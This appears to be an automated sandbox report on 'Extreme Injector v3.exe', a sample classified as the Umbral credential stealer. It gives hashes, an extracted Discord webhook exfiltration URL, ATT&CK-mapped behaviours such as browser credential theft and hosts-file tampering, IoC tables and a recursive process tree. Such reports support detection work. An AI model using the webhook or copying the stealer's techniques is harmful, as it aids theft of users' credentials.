umbral | 261d6fc361222284586e133e152797651ecde629ac3243cf47dba5af1fa4c3cc

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19-01-2025 14:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Extreme Injector v3.exe
Size

1.4MB
MD5

2290a5c6cfd6f8bd2e3ad188e7eafa05
SHA1

1b863031e8556e48fa63d233b768148d87dda7c4
SHA256

261d6fc361222284586e133e152797651ecde629ac3243cf47dba5af1fa4c3cc
SHA512

13310057c8f3e54a5c5c06b5976e6b97d2930191ee6c432e59faaf561968e6e6fa261021ffd2a08b040340f05ae878d7e46fdea4127032fb51fb0b0b2bdd82d7
SSDEEP

24576:PAOmi5Vm+lBnehvY2iPr93CeF1LH1Xt5QezP9tHtR9JSWmsMrlA18VnZAWQvKsoe:E4FdetMVCK1LVXXQezP3+Wgm18VeWouS

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1330303031618834494/9EbwLYdGRckxpwmC1x4tuNXcnptDOj3OQ10dKAGSqevucBbQ362A75MKfWoz9gAFomh6

Signatures

Detect Umbral payload 15 IoCs

resource	yara_rule
behavioral1/files/0x000c00000001225b-7.dat	family_umbral
behavioral1/memory/1464-8-0x00000000001B0000-0x00000000001F0000-memory.dmp	family_umbral
behavioral1/memory/556-61-0x0000000000EA0000-0x0000000000EE0000-memory.dmp	family_umbral
behavioral1/memory/1048-109-0x0000000000060000-0x00000000000A0000-memory.dmp	family_umbral
behavioral1/memory/2824-154-0x00000000002C0000-0x0000000000300000-memory.dmp	family_umbral
behavioral1/memory/2448-200-0x0000000001350000-0x0000000001390000-memory.dmp	family_umbral
behavioral1/memory/2896-414-0x00000000002E0000-0x0000000000320000-memory.dmp	family_umbral
behavioral1/memory/2288-449-0x0000000000F70000-0x0000000000FB0000-memory.dmp	family_umbral
behavioral1/memory/1428-484-0x0000000000FE0000-0x0000000001020000-memory.dmp	family_umbral
behavioral1/memory/1740-519-0x0000000001220000-0x0000000001260000-memory.dmp	family_umbral
behavioral1/memory/2964-554-0x00000000002B0000-0x00000000002F0000-memory.dmp	family_umbral
behavioral1/memory/1380-589-0x00000000010C0000-0x0000000001100000-memory.dmp	family_umbral
behavioral1/memory/1800-624-0x0000000001270000-0x00000000012B0000-memory.dmp	family_umbral
behavioral1/memory/3036-659-0x0000000000080000-0x00000000000C0000-memory.dmp	family_umbral
behavioral1/memory/3020-691-0x0000000000270000-0x00000000002B0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2656	powershell.exe
2364	powershell.exe
2596	powershell.exe
2080	powershell.exe
872	powershell.exe
1740	powershell.exe
2552	powershell.exe
600	powershell.exe
1612	powershell.exe
1064	powershell.exe
1688	powershell.exe
2564	powershell.exe
1976	powershell.exe
1900	powershell.exe
316	powershell.exe
1960	powershell.exe
2236	powershell.exe
1796	powershell.exe
2924	powershell.exe
1808	powershell.exe
560	powershell.exe
1536	powershell.exe
1856	powershell.exe
2572	powershell.exe
2664	powershell.exe
1516	powershell.exe
2588	powershell.exe
1220	powershell.exe
2992	powershell.exe
2728	powershell.exe
2176	powershell.exe
2656	powershell.exe
2708	powershell.exe
2848	powershell.exe
2256	powershell.exe
1968	powershell.exe
932	powershell.exe
2368	powershell.exe
2848	powershell.exe
2804	powershell.exe
568	powershell.exe
1060	powershell.exe
2848	powershell.exe
1300	powershell.exe
308	powershell.exe
2936	powershell.exe
1716	powershell.exe
1348	powershell.exe
3068	powershell.exe
444	powershell.exe
1748	powershell.exe
2688	powershell.exe
2072	powershell.exe
2980	powershell.exe
1960	powershell.exe
2608	powershell.exe
3024	powershell.exe
768	powershell.exe
2144	powershell.exe
876	powershell.exe
352	powershell.exe
2148	powershell.exe
2936	powershell.exe
2788	powershell.exe

Drops file in Drivers directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe

Executes dropped EXE 64 IoCs

pid	Process
1464	Extreme Injector.exe
2868	Extreme Injector.exe
2744	Extreme Injector.exe
2264	Extreme Injector.exe
556	Extreme Injector.exe
1728	Extreme Injector.exe
1964	Extreme Injector.exe
1188	Extreme Injector.exe
1048	Extreme Injector.exe
2680	Extreme Injector.exe
2860	Extreme Injector.exe
1152	Extreme Injector.exe
2824	Extreme Injector.exe
872	Extreme Injector.exe
3056	Extreme Injector.exe
2448	Extreme Injector.exe
2644	Extreme Injector.exe
1240	Extreme Injector.exe
2632	Extreme Injector.exe
2596	Extreme Injector.exe
1276	Extreme Injector.exe
3040	Extreme Injector.exe
2848	Extreme Injector.exe
2576	Extreme Injector.exe
2552	Extreme Injector.exe
1068	Extreme Injector.exe
2804	Extreme Injector.exe
768	Extreme Injector.exe
2684	Extreme Injector.exe
876	Extreme Injector.exe
2972	Extreme Injector.exe
3000	Extreme Injector.exe
1336	Extreme Injector.exe
1348	Extreme Injector.exe
2164	Extreme Injector.exe
2544	Extreme Injector.exe
1300	Extreme Injector.exe
2644	Extreme Injector.exe
2896	Extreme Injector.exe
3040	Extreme Injector.exe
2764	Extreme Injector.exe
2288	Extreme Injector.exe
2132	Extreme Injector.exe
1984	Extreme Injector.exe
2044	Extreme Injector.exe
2312	Extreme Injector.exe
1428	Extreme Injector.exe
2680	Extreme Injector.exe
3056	Extreme Injector.exe
1740	Extreme Injector.exe
2616	Extreme Injector.exe
2236	Extreme Injector.exe
2964	Extreme Injector.exe
2468	Extreme Injector.exe
1916	Extreme Injector.exe
1380	Extreme Injector.exe
1604	Extreme Injector.exe
1356	Extreme Injector.exe
2956	Extreme Injector.exe
1800	Extreme Injector.exe
2668	Extreme Injector.exe
2192	Extreme Injector.exe
3036	Extreme Injector.exe
2604	Extreme Injector.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 38 IoCs

Web Service

T1102

flow	ioc
57	discord.com
85	discord.com
86	discord.com
99	discord.com
120	discord.com
9	discord.com
15	discord.com
23	discord.com
36	discord.com
134	discord.com
16	discord.com
58	discord.com
107	discord.com
128	discord.com
135	discord.com
22	discord.com
50	discord.com
92	discord.com
121	discord.com
127	discord.com
37	discord.com
43	discord.com
65	discord.com
79	discord.com
30	discord.com
106	discord.com
113	discord.com
72	discord.com
78	discord.com
93	discord.com
100	discord.com
8	discord.com
44	discord.com
51	discord.com
71	discord.com
29	discord.com
64	discord.com
114	discord.com

Looks up external IP address via web service 19 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
69	ip-api.com
118	ip-api.com
125	ip-api.com
76	ip-api.com
90	ip-api.com
104	ip-api.com
13	ip-api.com
55	ip-api.com
62	ip-api.com
132	ip-api.com
6	ip-api.com
20	ip-api.com
111	ip-api.com
48	ip-api.com
83	ip-api.com
97	ip-api.com
27	ip-api.com
34	ip-api.com
41	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 38 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2816	cmd.exe
2128	cmd.exe
1692	PING.EXE
1964	PING.EXE
568	cmd.exe
1684	PING.EXE
2164	cmd.exe
464	PING.EXE
2956	PING.EXE
3064	PING.EXE
2600	cmd.exe
2856	PING.EXE
2908	cmd.exe
2840	cmd.exe
2460	cmd.exe
1584	cmd.exe
1516	PING.EXE
2184	cmd.exe
2412	PING.EXE
1988	cmd.exe
2324	PING.EXE
1536	PING.EXE
2512	cmd.exe
3048	cmd.exe
2492	PING.EXE
2320	cmd.exe
2812	PING.EXE
2260	cmd.exe
2624	cmd.exe
2504	PING.EXE
1520	PING.EXE
1380	PING.EXE
2420	PING.EXE
2736	PING.EXE
2884	cmd.exe
2888	cmd.exe
2656	PING.EXE
2168	cmd.exe

Detects videocard installed 1 TTPs 19 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1648	wmic.exe
2112	wmic.exe
2896	wmic.exe
1792	wmic.exe
1540	wmic.exe
2756	wmic.exe
2164	wmic.exe
1592	wmic.exe
1616	wmic.exe
772	wmic.exe
2044	wmic.exe
2380	wmic.exe
344	wmic.exe
2952	wmic.exe
2684	wmic.exe
1524	wmic.exe
2296	wmic.exe
1592	wmic.exe
1392	wmic.exe

Runs ping.exe 1 TTPs 19 IoCs

Remote System Discovery

T1018

pid	Process
1684	PING.EXE
2324	PING.EXE
1516	PING.EXE
1536	PING.EXE
2856	PING.EXE
2736	PING.EXE
1692	PING.EXE
464	PING.EXE
1520	PING.EXE
2412	PING.EXE
2504	PING.EXE
2420	PING.EXE
2656	PING.EXE
2812	PING.EXE
3064	PING.EXE
1964	PING.EXE
1380	PING.EXE
2956	PING.EXE
2492	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2936	powershell.exe
2596	powershell.exe
1064	powershell.exe
1724	powershell.exe
1716	powershell.exe
768	powershell.exe
2980	powershell.exe
1856	powershell.exe
2888	powershell.exe
2256	powershell.exe
2144	powershell.exe
2992	powershell.exe
568	powershell.exe
1908	powershell.exe
1968	powershell.exe
1240	powershell.exe
2368	powershell.exe
2924	powershell.exe
2372	powershell.exe
2728	powershell.exe
876	powershell.exe
1300	powershell.exe
2080	powershell.exe
2720	powershell.exe
1808	powershell.exe
1580	powershell.exe
2708	powershell.exe
1960	powershell.exe
1736	powershell.exe
1688	powershell.exe
2788	powershell.exe
1740	powershell.exe
1060	powershell.exe
2324	powershell.exe
3024	powershell.exe
2064	powershell.exe
2552	powershell.exe
600	powershell.exe
1044	powershell.exe
1748	powershell.exe
3068	powershell.exe
308	powershell.exe
2608	powershell.exe
1632	powershell.exe
1960	powershell.exe
2948	powershell.exe
2236	powershell.exe
2572	powershell.exe
2884	powershell.exe
2688	powershell.exe
1988	powershell.exe
2848	powershell.exe
1900	powershell.exe
2584	powershell.exe
560	powershell.exe
444	powershell.exe
2936	powershell.exe
1536	powershell.exe
1336	powershell.exe
2176	powershell.exe
1668	powershell.exe
2564	powershell.exe
2848	powershell.exe
1220	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1464	Extreme Injector.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeIncreaseQuotaPrivilege	2848	wmic.exe
Token: SeSecurityPrivilege	2848	wmic.exe
Token: SeTakeOwnershipPrivilege	2848	wmic.exe
Token: SeLoadDriverPrivilege	2848	wmic.exe
Token: SeSystemProfilePrivilege	2848	wmic.exe
Token: SeSystemtimePrivilege	2848	wmic.exe
Token: SeProfSingleProcessPrivilege	2848	wmic.exe
Token: SeIncBasePriorityPrivilege	2848	wmic.exe
Token: SeCreatePagefilePrivilege	2848	wmic.exe
Token: SeBackupPrivilege	2848	wmic.exe
Token: SeRestorePrivilege	2848	wmic.exe
Token: SeShutdownPrivilege	2848	wmic.exe
Token: SeDebugPrivilege	2848	wmic.exe
Token: SeSystemEnvironmentPrivilege	2848	wmic.exe
Token: SeRemoteShutdownPrivilege	2848	wmic.exe
Token: SeUndockPrivilege	2848	wmic.exe
Token: SeManageVolumePrivilege	2848	wmic.exe
Token: 33	2848	wmic.exe
Token: 34	2848	wmic.exe
Token: 35	2848	wmic.exe
Token: SeIncreaseQuotaPrivilege	2848	wmic.exe
Token: SeSecurityPrivilege	2848	wmic.exe
Token: SeTakeOwnershipPrivilege	2848	wmic.exe
Token: SeLoadDriverPrivilege	2848	wmic.exe
Token: SeSystemProfilePrivilege	2848	wmic.exe
Token: SeSystemtimePrivilege	2848	wmic.exe
Token: SeProfSingleProcessPrivilege	2848	wmic.exe
Token: SeIncBasePriorityPrivilege	2848	wmic.exe
Token: SeCreatePagefilePrivilege	2848	wmic.exe
Token: SeBackupPrivilege	2848	wmic.exe
Token: SeRestorePrivilege	2848	wmic.exe
Token: SeShutdownPrivilege	2848	wmic.exe
Token: SeDebugPrivilege	2848	wmic.exe
Token: SeSystemEnvironmentPrivilege	2848	wmic.exe
Token: SeRemoteShutdownPrivilege	2848	wmic.exe
Token: SeUndockPrivilege	2848	wmic.exe
Token: SeManageVolumePrivilege	2848	wmic.exe
Token: 33	2848	wmic.exe
Token: 34	2848	wmic.exe
Token: 35	2848	wmic.exe
Token: SeIncreaseQuotaPrivilege	348	wmic.exe
Token: SeSecurityPrivilege	348	wmic.exe
Token: SeTakeOwnershipPrivilege	348	wmic.exe
Token: SeLoadDriverPrivilege	348	wmic.exe
Token: SeSystemProfilePrivilege	348	wmic.exe
Token: SeSystemtimePrivilege	348	wmic.exe
Token: SeProfSingleProcessPrivilege	348	wmic.exe
Token: SeIncBasePriorityPrivilege	348	wmic.exe
Token: SeCreatePagefilePrivilege	348	wmic.exe
Token: SeBackupPrivilege	348	wmic.exe
Token: SeRestorePrivilege	348	wmic.exe
Token: SeShutdownPrivilege	348	wmic.exe
Token: SeDebugPrivilege	348	wmic.exe
Token: SeSystemEnvironmentPrivilege	348	wmic.exe
Token: SeRemoteShutdownPrivilege	348	wmic.exe
Token: SeUndockPrivilege	348	wmic.exe
Token: SeManageVolumePrivilege	348	wmic.exe
Token: 33	348	wmic.exe
Token: 34	348	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1880 wrote to memory of 2544	1880	Extreme Injector v3.exe	31
PID 1880 wrote to memory of 2544	1880	Extreme Injector v3.exe	31
PID 1880 wrote to memory of 2544	1880	Extreme Injector v3.exe	31
PID 1880 wrote to memory of 1464	1880	Extreme Injector v3.exe	32
PID 1880 wrote to memory of 1464	1880	Extreme Injector v3.exe	32
PID 1880 wrote to memory of 1464	1880	Extreme Injector v3.exe	32
PID 2544 wrote to memory of 2816	2544	Extreme Injector v3.exe	33
PID 2544 wrote to memory of 2816	2544	Extreme Injector v3.exe	33
PID 2544 wrote to memory of 2816	2544	Extreme Injector v3.exe	33
PID 2544 wrote to memory of 2868	2544	Extreme Injector v3.exe	34
PID 2544 wrote to memory of 2868	2544	Extreme Injector v3.exe	34
PID 2544 wrote to memory of 2868	2544	Extreme Injector v3.exe	34
PID 1464 wrote to memory of 2792	1464	Extreme Injector.exe	35
PID 1464 wrote to memory of 2792	1464	Extreme Injector.exe	35
PID 1464 wrote to memory of 2792	1464	Extreme Injector.exe	35
PID 1464 wrote to memory of 2936	1464	Extreme Injector.exe	37
PID 1464 wrote to memory of 2936	1464	Extreme Injector.exe	37
PID 1464 wrote to memory of 2936	1464	Extreme Injector.exe	37
PID 1464 wrote to memory of 2596	1464	Extreme Injector.exe	39
PID 1464 wrote to memory of 2596	1464	Extreme Injector.exe	39
PID 1464 wrote to memory of 2596	1464	Extreme Injector.exe	39
PID 2816 wrote to memory of 2172	2816	Extreme Injector v3.exe	41
PID 2816 wrote to memory of 2172	2816	Extreme Injector v3.exe	41
PID 2816 wrote to memory of 2172	2816	Extreme Injector v3.exe	41
PID 2816 wrote to memory of 2744	2816	Extreme Injector v3.exe	42
PID 2816 wrote to memory of 2744	2816	Extreme Injector v3.exe	42
PID 2816 wrote to memory of 2744	2816	Extreme Injector v3.exe	42
PID 1464 wrote to memory of 1064	1464	Extreme Injector.exe	43
PID 1464 wrote to memory of 1064	1464	Extreme Injector.exe	43
PID 1464 wrote to memory of 1064	1464	Extreme Injector.exe	43
PID 1464 wrote to memory of 1724	1464	Extreme Injector.exe	45
PID 1464 wrote to memory of 1724	1464	Extreme Injector.exe	45
PID 1464 wrote to memory of 1724	1464	Extreme Injector.exe	45
PID 1464 wrote to memory of 2848	1464	Extreme Injector.exe	47
PID 1464 wrote to memory of 2848	1464	Extreme Injector.exe	47
PID 1464 wrote to memory of 2848	1464	Extreme Injector.exe	47
PID 2172 wrote to memory of 2220	2172	Extreme Injector v3.exe	49
PID 2172 wrote to memory of 2220	2172	Extreme Injector v3.exe	49
PID 2172 wrote to memory of 2220	2172	Extreme Injector v3.exe	49
PID 2172 wrote to memory of 2264	2172	Extreme Injector v3.exe	50
PID 2172 wrote to memory of 2264	2172	Extreme Injector v3.exe	50
PID 2172 wrote to memory of 2264	2172	Extreme Injector v3.exe	50
PID 1464 wrote to memory of 348	1464	Extreme Injector.exe	52
PID 1464 wrote to memory of 348	1464	Extreme Injector.exe	52
PID 1464 wrote to memory of 348	1464	Extreme Injector.exe	52
PID 1464 wrote to memory of 1068	1464	Extreme Injector.exe	54
PID 1464 wrote to memory of 1068	1464	Extreme Injector.exe	54
PID 1464 wrote to memory of 1068	1464	Extreme Injector.exe	54
PID 1464 wrote to memory of 1716	1464	Extreme Injector.exe	56
PID 1464 wrote to memory of 1716	1464	Extreme Injector.exe	56
PID 1464 wrote to memory of 1716	1464	Extreme Injector.exe	56
PID 1464 wrote to memory of 1616	1464	Extreme Injector.exe	58
PID 1464 wrote to memory of 1616	1464	Extreme Injector.exe	58
PID 1464 wrote to memory of 1616	1464	Extreme Injector.exe	58
PID 1464 wrote to memory of 2460	1464	Extreme Injector.exe	60
PID 1464 wrote to memory of 2460	1464	Extreme Injector.exe	60
PID 1464 wrote to memory of 2460	1464	Extreme Injector.exe	60
PID 2460 wrote to memory of 1380	2460	cmd.exe	62
PID 2460 wrote to memory of 1380	2460	cmd.exe	62
PID 2460 wrote to memory of 1380	2460	cmd.exe	62
PID 2220 wrote to memory of 2976	2220	Extreme Injector v3.exe	63
PID 2220 wrote to memory of 2976	2220	Extreme Injector v3.exe	63
PID 2220 wrote to memory of 2976	2220	Extreme Injector v3.exe	63
PID 2220 wrote to memory of 556	2220	Extreme Injector v3.exe	64

Views/modifies file attributes 1 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2792	attrib.exe
1716	attrib.exe
1748	attrib.exe
2112	attrib.exe
288	attrib.exe
764	attrib.exe
2772	attrib.exe
1752	attrib.exe
3020	attrib.exe
1564	attrib.exe
2680	attrib.exe
2324	attrib.exe
2132	attrib.exe
2168	attrib.exe
2728	attrib.exe
1192	attrib.exe
2148	attrib.exe
2776	attrib.exe
2768	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
"C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1880
- C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
  "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2544
- - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
    "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
      "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2172
    - - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2220
      - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        6⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        7⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        8⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        9⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        10⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        11⤵
        
        PID:352
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        12⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        13⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        14⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        15⤵
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        16⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        17⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        18⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        19⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        20⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        21⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        22⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        23⤵
        
        PID:616
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        24⤵
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        25⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        26⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        27⤵
        
        PID:348
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        28⤵
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        29⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        30⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        31⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        32⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        33⤵
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        34⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        35⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        36⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        37⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        38⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        39⤵
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        40⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        41⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        42⤵
        
        PID:1380
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        43⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        44⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        45⤵
        
        PID:1168
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        46⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        47⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        48⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        49⤵
        
        PID:348
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        50⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        51⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        52⤵
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        53⤵
        
